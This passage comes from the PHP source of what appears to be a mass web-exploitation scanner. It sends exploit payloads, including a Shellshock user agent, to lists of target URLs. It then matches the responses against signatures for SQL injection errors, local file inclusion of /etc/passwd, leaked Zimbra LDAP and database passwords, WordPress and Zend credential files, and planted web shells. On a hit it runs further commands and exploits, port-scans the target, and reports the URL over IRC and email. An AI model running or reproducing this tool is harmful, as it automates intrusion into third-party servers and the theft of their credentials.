"{$_SESSION["c4"]}{$_SESSION['config']['curl_getinfo']['redirect_url']}" : NULL;
$exget = (not_isnull_empty($_SESSION['config']['exploit-get']) ? ' _/GET=> ' . $_SESSION['config']['exploit-get'] : NULL);
$expost = (not_isnull_empty($_SESSION['config']['exploit-post']) ? ' _/POST=> ' . $_SESSION['config']['exploit-post_str'] : NULL);
$valid_return = (not_isnull_empty($_SESSION['config']['erroReturn'])) ? TRUE : FALSE;
$info = ($valid_return) ? "{$_SESSION["c4"]}{$info}" : $info;
$target_ip = ($valid_return) ? "{$_SESSION["c4"]}{$_SESSION['config']['info_ip']}" : $_SESSION['config']['info_ip'];
$anime = ($valid_return) ? '[ ! ]' : '[ - ]';
echo __plus() . "\n";
echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
echo "{$_SESSION["c1"]}|_[ + ] [{$_SESSION["c1"]} {$contUrl} / {$_SESSION['config']['total_url']} {$_SESSION["c1"]}]{$_SESSION["c9"]}-[" . date("H:i:s") . "]{$_SESSION["c1"]} {$anime} {$_SESSION["c0"]}\n";
echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Target:: {$_SESSION["c1"]}[{$_SESSION["c9"]} {$_SESSION['config']['vull_style']}{$target_['url_clean']}{$_SESSION["c1"]} ]{$_SESSION["c0"]}\n";
echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Exploit:: {$_SESSION["c0"]}{$_SESSION["c3"]}{$exget}{$expost}{$_SESSION["c0"]}\n";
echo (not_isnull_empty($_SESSION['config']['replace'])) ? ("{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Replace:: {$_SESSION["c0"]}{$_SESSION["c3"]}{$_SESSION['config']['replace']}{$_SESSION["c0"]}\n") : NULL;
echo (not_isnull_empty($_SESSION['config']['remove'])) ? ("{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Remove:: {$_SESSION["c0"]}{$_SESSION["c3"]}{$_SESSION['config']['remove']}{$_SESSION["c0"]}\n") : NULL;
echo (isset($_SESSION['config']['cms-check-resultado'])) ? ("{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}CMS check:: {$_SESSION["c0"]}{$_SESSION["c3"]}{$_SESSION['config']['cms-check-resultado']}{$_SESSION["c0"]}\n") : NULL;
echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Information Server:: {$_SESSION["c0"]}{$_SESSION["c9"]}{$info}{$_SESSION["c1"]}\n";
echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}More details:: {$_SESSION["c0"]}{$_SESSION["c9"]}{$target_ip}{$_SESSION["c1"]}\n";
echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Found:: {$_SESSION["c9"]}" . ($valid_return ? "{$_SESSION["c4"]}{$_SESSION['config']['erroReturn']}" : "UNIDENTIFIED") . "{$_SESSION["c0"]}";
echo (not_isnull_empty($ifredirect) ? "\n{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}URL REDIRECT:: {$_SESSION["c9"]}{$ifredirect}{$_SESSION["c0"]}" : NULL);
echo (not_isnull_empty($_SESSION['config']['error_conection']) ? "\n{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}ERROR CONECTION:: {$_SESSION["c2"]}{$_SESSION['config']['error_conection']}{$_SESSION["c0"]}" : NULL);
($valid_return ? __saveValue($_SESSION['config']['arquivo_output'], $target_['url_xpl'], 1) : NULL);
echo ($_SESSION['config']['sendmail'] ? "\n{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}SEND MAIL:: {$_SESSION["c9"]}" . (($valid_return) ? "{$_SESSION["c4"]}" : NULL) . __sendMail($_SESSION['config']['sendmail'], $target_['url_xpl']) . "{$_SESSION["c0"]}" : NULL);
(not_isnull_empty($_SESSION['config']['arquivo_output_all']) ? __saveValue($_SESSION['config']['arquivo_output_all'], $target_['url_xpl'], NULL) : NULL);
__plus();
if ($valid_return) {
(not_isnull_empty($_SESSION['config']['irc']['irc_connection']) ?
__ircMsg($_SESSION['config']['irc'], "{$_SESSION['config']['erroReturn']}::: {$target_['url_xpl']}") : NULL);
__plus();
(not_isnull_empty($_SESSION['config']['command-vul']) ? __command($_SESSION['config']['command-vul'], $target_) : NULL);
__plus();
(not_isnull_empty($_SESSION['config']['exploit-vul-id']) ?
__configExploitsExec($_SESSION['config']['exploit-vul-id'], $target_) : NULL);
__plus();
}
(not_isnull_empty($_SESSION['config']['command-all']) ? __command($_SESSION['config']['command-all'], $target_) : NULL);
__plus();
(not_isnull_empty($_SESSION['config']['sub-file']) &&
is_array($_SESSION['config']['sub-file']) ? __subExecExploits($target_['url_xpl'], $_SESSION['config']['sub-file']) : NULL);
__plus();
(not_isnull_empty($_SESSION['config']['exploit-all-id']) ? __configExploitsExec($_SESSION['config']['exploit-all-id'], $target_) : NULL);
__plus();
($_SESSION['config']['robots'] ? __getValuesRobots($host) : NULL);
__plus();
(not_isnull_empty($_SESSION['config']['port-scan']) ? __portScan(array(0 => $target_, 1 => $_SESSION['config']['port-scan'])) : NULL);
__plus();
__timeSec('delay', "\n");
}
}
################################################################################
#PRINT MESSAGE AND OUT OF THE PROCESS###########################################
################################################################################
function __getOut($msg) {
__ircQuit($_SESSION['config']['irc']);
print_r($msg);
exit(1);
}
################################################################################
#ERROR MAIN PROCESS RESPONSIBLE FOR ALL VALIDATION OF ENGINE####################
################################################################################
function __process($resultadoURL) {
__plus();
$resultadoURL[0] = (is_array($resultadoURL) ? array_unique(array_filter($resultadoURL)) : $resultadoURL);
$resultadoURL[0] = ($_SESSION['config']['unique'] ? __filterDomainUnique($resultadoURL[0]) : $resultadoURL[0]);
$resultadoURL[0] = (not_isnull_empty($_SESSION['config']['ifurl']) ? __filterURLif($resultadoURL[0]) : $resultadoURL[0]);
$_SESSION['config']['total_url'] = count($resultadoURL[0]);
echo "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c12"]}[ TOTAL FOUND VALUES ]::{$_SESSION["c1"]} [ {$_SESSION['config']['total_url']} ]{$_SESSION["c0"]}\n";
__debug(array('debug' => $resultadoURL[0], 'function' => '__process'), 3);
if (count($resultadoURL[0]) > 0) {
$_SESSION['config']['irc']['irc_connection'] = (not_isnull_empty($_SESSION['config']['irc']['conf']) ? __ircConect($_SESSION['config']['irc']) : NULL);
$_SESSION['config']['irc']['my_fork'] = pcntl_fork();
if ($_SESSION['config']['irc']['my_fork'] == 0) {
(not_isnull_empty($_SESSION['config']['irc']['irc_connection']) ? __ircPong($_SESSION['config']['irc']) : NULL);
exit(0);
} else if ($_SESSION['config']['irc']['my_fork'] == -1) {
__getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}ERROR Fork failed{$_SESSION["c0"]}\n");
}
$_SESSION['config']['user-agent'] = ($_SESSION['config']['shellshock']) ? $_SESSION['config']['user_agent_xpl'] : $_SESSION['config']['user-agent'];
foreach ($resultadoURL[0] as $url) {
__plus();
$url = urldecode(not_isnull_empty($_SESSION['config']['target']) ?
$_SESSION['config']['target'] . $url : $url);
if (__validateURL($url) || not_isnull_empty($_SESSION['config']['abrir-arquivo'])) {
__processUrlExec(__filterURLTAG($url), $_SESSION["config"]["contUrl"] ++);
__plus();
}
}
} else {
print_r("{$_SESSION["c1"]}[ INFO ]{$_SESSION["c2"]} Not a satisfactory result was found!{$_SESSION["c0"]}\n");
}
}
################################################################################
#ERRORS STANDARDS OF SCRIPT VALIDATE WITH HTML RECEIVED#########################
################################################################################
function __checkError($html_) {
if (__validateOptions($_SESSION['config']['tipoerro'], '2')) {
$validation['ERROR-CUSTOM'] = not_isnull_empty($_SESSION['config']['achar']) ? $_SESSION['config']['achar'] : NULL;
}
if (__validateOptions('1,3,4', $_SESSION['config']['tipoerro'])) {
if (__validateOptions('3,4', $_SESSION['config']['tipoerro'])) {
$validation['ERROR-CUSTOM'] = not_isnull_empty($_SESSION['config']['achar']) ? $_SESSION['config']['achar'] : NULL;
}
/* [*]SHELLSHOCK
* (CVE-2014-6271, CVE-2014-6277,
* CVE-2014-6278, CVE-2014-7169,
* CVE-2014-7186, CVE-2014-7187)
* is a vulnerability in GNU's bash shell that gives attackers access
* to run remote commands on a vulnerable system. */
$validation['SHELLSHOCK-01'] = '99887766555';
/* [*]LOCAL FILE INCLUSION
* Local File Inclusion (also known as LFI) is the process of including
* files, that are already locally present on the server, through the
* exploiting of vulnerable inclusion procedures implemented in the
* application.
* https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion */
$validation['LOCAL-FILE-INCLUSION-01'] = '/root:/';
$validation['LOCAL-FILE-INCLUSION-02'] = 'root:x:0:0:';
$validation['LOCAL-FILE-INCLUSION-03'] = 'mysql:x:';
/* [*]ZIMBRA MAIL
* Zimbra 0day exploit / Privilegie escalation via LFI
* This script exploits a Local File Inclusion in
* /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
* which allows us to see localconfig.xml
* that contains LDAP root credentials wich allow us to make requests in
* /service/admin/soap API with the stolen LDAP credentials to create user
* with administration privlegies
* and gain acces to the Administration Console.
* https://www.exploit-db.com/exploits/30085/ */
$validation['ZIMBRA-WEB-MAIL-01'] = 'zimbra_user';
$validation['ZIMBRA-WEB-MAIL-02'] = 'zimbra_ldap_password';
$validation['ZIMBRA-WEB-MAIL-03'] = 'ldap_replication_password';
$validation['ZIMBRA-WEB-MAIL-04'] = 'ldap_root_password';
$validation['ZIMBRA-WEB-MAIL-05'] = 'ldap_nginx_password';
$validation['ZIMBRA-WEB-MAIL-06'] = 'mailboxd_keystore_password';
$validation['ZIMBRA-WEB-MAIL-07'] = 'zimbra_mysql_password';
$validation['ZIMBRA-WEB-MAIL-08'] = 'mysql_root_password';
$validation['ZIMBRA-WEB-MAIL-10'] = 'mailboxd_truststore_password';
$validation['ZIMBRA-WEB-MAIL-11'] = 'ldap_postfix_password';
$validation['ZIMBRA-WEB-MAIL-12'] = 'ldap_amavis_password';
/* [*]ZEND FRAMEWORK
* Zend-Framework Full Info Disclosure
* The username and password of the database may be obtained trough
* the "application.ini" file
* https://www.exploit-db.com/exploits/29921/ */
$validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';
$validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';
$validation['ZEND-FRAMEWORK-03'] = 'db.params.username';
$validation['ZEND-FRAMEWORK-04'] = 'db.params.password';
$validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';
/* [*]CMS WORDPRESS
* As the name suggests, if the web application doesn’t check the file
* name required by the user, any malicious user can exploit this
* vulnerability to download sensitive files from the server.
* Arbitrary File Download vulnerability file wp-config.php
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
* http://www.acunetix.com/vulnerabilities/web/wordpress-plugin-slider-revolution-arbitrary-file-disclosure */
$validation['CMS-WORDPRESS-01'] = "define('DB_NAME'";
$validation['CMS-WORDPRESS-02'] = "define('DB_USER'";
$validation['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
$validation['CMS-WORDPRESS-04'] = "define('DB_HOST'";
/* [*]ERROR MARIADB
* MariaDB is a drop-in replacement for MySQL.
* MariaDB strives to be the logical choice for database professionals
* looking for a robust, scalable, and reliable SQL server. To accomplish
* this, the MariaDB Foundation work closely and cooperatively with the
* larger community of users and developers in the true spirit of Free
* and open source software, and release software in a manner that
* balances predictability with reliability.
* https://mariadb.org/en/about/ */
$validation['MARIADB-01'] = 'MariaDB server version for the right syntax';
/* [*]ERROR MYSQL
* MySQL is a database management system (DBMS), which uses the SQL
* (Structured Query Language, English Structured Query Language) as
* interface. It is currently one of the most popular databases, with
* more than 10 million installations worldwide
* https://www.mysql.com/
* http://php.net/manual/en/security.database.sql-injection.php
*/
$validation['MYSQL-AND-MARIADB'] = 'You have an error in your SQL syntax;';
$validation['MYSQL-03'] = 'Warning: mysql_';
$validation['MYSQL-04'] = 'function.mysql';
$validation['MYSQL-05'] = 'MySQL result index';
$validation['MYSQL-07'] = 'MySQL Error';
$validation['MYSQL-08'] = 'MySQL ODBC';
$validation['MYSQL-09'] = 'MySQL Driver';
$validation['MYSQL-10'] = 'mysqli.query';
$validation['MYSQL-11'] = 'num_rows';
$validation['MYSQL-12'] = 'mysql error:';
$validation['MYSQL-13'] = 'supplied argument is not a valid MySQL result resource';
$validation['MYSQL-14'] = 'on MySQL result index';
$validation['MYSQL-15'] = 'Error Executing Database Query';
$validation['MYSQL-01'] = 'mysql_';
/* [*]ERROR MICROSOFT
* MICROSOFT TECHNOLOGY
* http://www.microsoft.com/pt-br/server-cloud/products/sql-server/
* https://products.office.com/pt-br/access
* https://www.owasp.org/index.php/Testing_for_SQL_Server */
$validation['MICROSOFT-01'] = 'Microsoft JET Database';
$validation['MICROSOFT-02'] = 'ADODB.Recordset';
$validation['MICROSOFT-03'] = '500 - Internal server error';
$validation['MICROSOFT-04'] = 'Microsoft OLE DB Provider';
$validation['MICROSOFT-05'] = 'Unclosed quotes';
$validation['MICROSOFT-06'] = 'ADODB.Command';
$validation['MICROSOFT-07'] = 'ADODB.Field error';
$validation['MICROSOFT-08'] = 'Microsoft VBScript';
$validation['MICROSOFT-09'] = 'Microsoft OLE DB Provider for SQL Server';
$validation['MICROSOFT-10'] = 'Unclosed quotation mark';
$validation['MICROSOFT-11'] = 'Microsoft OLE DB Provider for Oracle';
$validation['MICROSOFT-14'] = 'Active Server Pages error';
$validation['MICROSOFT-15'] = 'OLE/DB provider returned message';
$validation['MICROSOFT-16'] = 'OLE DB Provider for ODBC';
$validation['MICROSOFT-17'] = "error '800a0d5d'";
$validation['MICROSOFT-18'] = "error '800a000d'";
$validation['MICROSOFT-19'] = 'Unclosed quotation mark after the character string';
$validation['MICROSOFT-20'] = '[Microsoft][SQL Server Native Client 11.0][SQL Server]';
$validation['MICROSOFT-21'] = 'Warning: odbc_';
/* #[*]ERROR ORACLE
* - DBMS currently marketed by Oracle, who was born in 1979 and was
* the first relational BD sold worldwide;
* - Latest version: Oracle Database 11G;
* http://www.oracle.com/br/solutions/midsize/oracle-products/database/index.html
* https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-fayo.pdf */
$validation['ORACLE-01'] = 'ORA-00921: unexpected end of SQL command';
$validation['ORACLE-02'] = 'ORA-01756';
$validation['ORACLE-03'] = 'ORA-';
$validation['ORACLE-04'] = 'Oracle ODBC';
$validation['ORACLE-05'] = 'Oracle Error';
$validation['ORACLE-06'] = 'Oracle Driver';
$validation['ORACLE-07'] = 'Oracle DB2';
$validation['ORACLE-08'] = 'error ORA-';
$validation['ORACLE-09'] = 'SQL command not properly ended';
/* #[*]ERROR DB2
* DB2 is a database system Relational Manager (SGDBR) produced by IBM.
* There are different versions of DB2 running from a simple PDA |
* handheld, even in powerful mainframes and run on servers based on
* Unix, Windows, or Linux.
* http://www-01.ibm.com/software/br/db2/lowerdatabasecosts/
* https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet#DB2_Escaping */
$validation['DB2-01'] = 'DB2 ODBC';
$validation['DB2-02'] = 'DB2 error';
$validation['DB2-03'] = 'DB2 Driver';
/* #[*]ERROR ODBC
* ODBC (acronym for Open Database Connectivity) is a standard for
* access to managers of database systems (DBMS).
* https://support.office.com/pt-br/article/Administrar-fontes-de-dados-ODBC-b19f856b-5b9b-48c9-8b93-07484bfab5a7
* https://www.exploit-db.com/papers/12975/ */
$validation['ODBC-01'] = 'ODBC SQL';
$validation['ODBC-02'] = 'ODBC DB2';
$validation['ODBC-03'] = 'ODBC Driver';
$validation['ODBC-04'] = 'ODBC Error';
$validation['ODBC-05'] = 'ODBC Microsoft Access';
$validation['ODBC-06'] = 'ODBC Oracle';
$validation['ODBC-07'] = 'ODBC Microsoft Access Driver';
/* #[*]ERROR POSTGRESQL
* PostgreSQL is an object-relational database management system
* (ORDBMS), developed as an open source project.
* http://www.postgresql.org.br/old/
* https://www.owasp.org/index.php/OWASP_Backend_Security_Project_Testing_PostgreSQL */
$validation['POSTGRESQL-01'] = 'Warning: pg_';
$validation['POSTGRESQL-02'] = 'PostgreSql Error:';
$validation['POSTGRESQL-03'] = 'function.pg';
$validation['POSTGRESQL-04'] = 'Supplied argument is not a valid PostgreSQL result';
$validation['POSTGRESQL-05'] = 'PostgreSQL query failed: ERROR: parser: parse error';
$validation['POSTGRESQL-06'] = 'pg_';
/* #[*]ERROR SYBASE
* Sybase (NYSE: SY), an SAP company, is a software company that
* produces services and products related to information management,
* mobility, messaging, development tools, and data warehousing and
* OLAP data.
* https://www.owasp.org/index.php?search=SYBASE&title=Special%3ASearch&go=Go */
$validation['SYBASE-01'] = 'Warning: sybase_';
$validation['SYBASE-02'] = 'function.sybase';
$validation['SYBASE-03'] = 'Sybase result index';
$validation['SYBASE-04'] = 'Sybase Error:';
$validation['SYBASE-05'] = 'Sybase: Server message:';
$validation['SYBASE-06'] = 'sybase_';
$validation['SYBASE-07'] = '[Sybase][ODBC Driver]:';
/* #[*]ERROR JBOSSWEB
* JBoss Web Server is an enterprise ready web server designed for
* medium and large applications, based on Tomcat.
* JBoss Web a component of the JBoss Application Server, there are
* no more standalone version of JBoss Web you need the Application
* Server to get the Servlet/JSP container.
* http://jbossweb.jboss.org/
* http://www.rapid7.com/db/search?utf8=%E2%9C%93&q=JBoss+&t=a */
$validation['JBOSSWEB-01'] = 'java.sql.SQLSyntaxErrorException: ORA-';
$validation['JBOSSWEB-02'] = 'org.springframework.jdbc.BadSqlGrammarException:';
$validation['JBOSSWEB-03'] = 'javax.servlet.ServletException:';
$validation['JBOSSWEB-04'] = 'java.lang.NullPointerException';
/* #[*]ERROR JDBC
* Java Database Connectivity or JDBC is a set of classes and
* interfaces (API) written in Java that make sending SQL statements
* for any relational database
* http://www.oracle.com/technetwork/java/javase/jdbc/index.html
* https://www.owasp.org/index.php/Preventing_SQL_Injection_in_Java */
$validation['JDBC_CFM-01'] = 'Error Executing Database Query';
$validation['JDBC_CFM-02'] = 'SQLServer JDBC Driver';
$validation['JDBC_CFM-03'] = 'JDBC SQL';
$validation['JDBC_CFM-04'] = 'JDBC Oracle';
$validation['JDBC_CFM-05'] = 'JDBC MySQL';
$validation['JDBC_CFM-06'] = 'JDBC error';
$validation['JDBC_CFM-07'] = 'JDBC Driver';
/* #[*]JAVA INFINITYDB
* InfinityDB is an all-Java embedded database engine that is deployed
* in handheld devices, on servers, on workstations, and in distributed
* settings. */
$validation['JAVA-INFINITYDB-01'] = 'java.io.IOException: InfinityDB';
/* #[*]ERROR PHP
* The PHP development team announces the immediate availability of
* PHP 5.4.40. 14 security-related bugs were fixed in this release,
* including CVE-2014-9709, CVE-2015-2301, CVE-2015-2783, CVE-2015-1352.
* All PHP 5.4 users are encouraged to upgrade to this version.
* http://php.net/ */
$validation['ERRORPHP-01'] = 'Warning: include';
$validation['ERRORPHP-02'] = 'Fatal error: include';
$validation['ERRORPHP-03'] = 'Warning: require';
$validation['ERRORPHP-04'] = 'Fatal error: require';
$validation['ERRORPHP-05'] = 'ADODB_Exception';
$validation['ERRORPHP-06'] = 'Warning: include(';
$validation['ERRORPHP-07'] = 'Warning: require_once(';
$validation['ERRORPHP-08'] = 'function.include';
$validation['ERRORPHP-09'] = 'Disallowed Parent Path';
$validation['ERRORPHP-10'] = 'function.require';
$validation['ERRORPHP-11'] = 'Warning: main(';
$validation['ERRORPHP-12'] = 'Warning: session_start()';
$validation['ERRORPHP-13'] = 'Warning: getimagesize()';
$validation['ERRORPHP-16'] = 'Warning: array_merge()';
$validation['ERRORPHP-17'] = 'Warning: preg_match()';
$validation['ERRORPHP-18'] = 'GetArray()';
$validation['ERRORPHP-19'] = 'FetchRow()';
$validation['ERRORPHP-20'] = 'Warning: preg_';
$validation['ERRORPHP-21'] = 'Warning: ociexecute()';
$validation['ERRORPHP-22'] = 'Warning: ocifetchstatement()';
$validation['ERRORPHP-23'] = 'PHP Warning:';
/* #[*]ERROR ASP
* The ASP (Active Server Pages), also known as Classic ASP today, is a
* framework of basic libraries (and not a language) for processing of
* scripting languages on the server side to generate dynamic content on
* the Web
* http://www.asp.net/ */
$validation['ERRORASP-01'] = 'Version Information: Microsoft .NET Framework';
$validation['ERRORASP-04'] = 'ASP.NET is configured to show verbose error messages';
$validation['ERRORASP-05'] = 'BOF or EOF';
$validation['ERRORASP-06'] = 'Unclosed quotation mark';
$validation['ERRORASP-06'] = 'Error converting data type varchar to numeric';
/* #[*]ERROR LUA
* Lua is a scripting language imperative, procedural, small, reflective
* and light, designed to expand applications in general, to be an
* extensible language (which connects parts of a program made in more
* than one language)
* http://www.lua.org/ */
$validation['ERRORLUA-01'] = 'LuaPlayer ERROR:';
$validation['ERRORLUA-02'] = 'CGILua message';
$validation['ERRORLUA-03'] = 'Lua error';
#[*]ERROR INDEFINIDOS
$validation['INDEFINITE-01'] = 'Incorrect syntax near';
$validation['INDEFINITE-02'] = 'Fatal error';
$validation['INDEFINITE-04'] = 'Invalid Querystring';
$validation['INDEFINITE-05'] = 'Input string was not in a correct format';
$validation['INDEFINITE-06'] = 'An illegal character has been found in the statement';
#[*]SHELL SCRIPT backdoored.
$validation['SHELL-01'] = 'c99shell';
$validation['SHELL-02'] = 'C99Shell v';
$validation['SHELL-03'] = '